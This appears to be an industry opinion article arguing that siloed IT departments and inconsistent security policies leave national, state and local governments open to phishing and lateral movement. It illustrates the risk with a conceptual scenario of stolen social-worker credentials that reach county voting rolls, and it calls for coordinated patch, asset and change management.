Inside every national, state, city and local government are many different departments, each with its own information technology requirements and solutions. Too often, the teams that run these systems don’t interoperate with other groups. For example, in county government, there is a clerk and recorder responsible for elections, police responsible for civil protection and social services responsible for improving social welfare in the community. Each of these groups might have its own IT shop that manages the computers and networks for the department.
There is typically little to no communication between the people who set up, manage and maintain these environments. To make matters worse, the policies and procedures used to build and harden security infrastructures are rarely consistent between departments. Lack of commonality leads to extreme risk, and the larger the government organization, the more points of entry it has and the more threats it faces.
Threat actors understand these deficiencies and can identify vulnerabilities relatively easily through several methods. Today, the most common approach involves phishing attacks in which an attacker attempts to trick an end user into providing credentials for one part of a network. Since most government networks communicate and connect with each other, a breach in one division puts the rest at risk as well.
Imagine that a social worker loses control of his or her credentials, and a threat actor proceeds to access that environment and move laterally through the network to infiltrate the police department and the county clerk and recorder. This individual could acquire valuable data such as voting rolls for a county. The lack of procedures to manage credentials and patch systems between government entities increases the risk of both losing control of login information and permitting lateral movement between government bodies. This scenario epitomizes a substantial risk to governments that other industries do not face.
Government Cybersecurity Improvements Won’t Come Easy
Since governments have so many potential attack vectors, both physically and virtually, government cybersecurity professionals need clear processes, procedures and authority to harden vulnerable environments.
Whether they’re implementing asset management, patch management, change management or any number of critical security mechanisms, governments and their partners need to consolidate and coordinate between internal entities to make sure every attack vector has proper defensive positioning. The number of endpoints, network connections and infrastructure devices that interoperate internally within a government body at any level creates substantial risks, and the entire environment must be understood and modifiable to ensure proper protection.
The challenges governments face in hardening their environments are large and widespread, with drastic change being the only foreseeable solution. Engaging disparate teams to integrate and interoperate, both operationally and procedurally, will take strong leadership and bold decisions. Unless and until we see a major change in both the behavior and understanding of the threat landscape, there will be more and more attacks and, sadly, they will become more dangerous and impactful to governments on a regular basis. Without major modifications inside government cybersecurity organizations, we are in for a bumpy ride.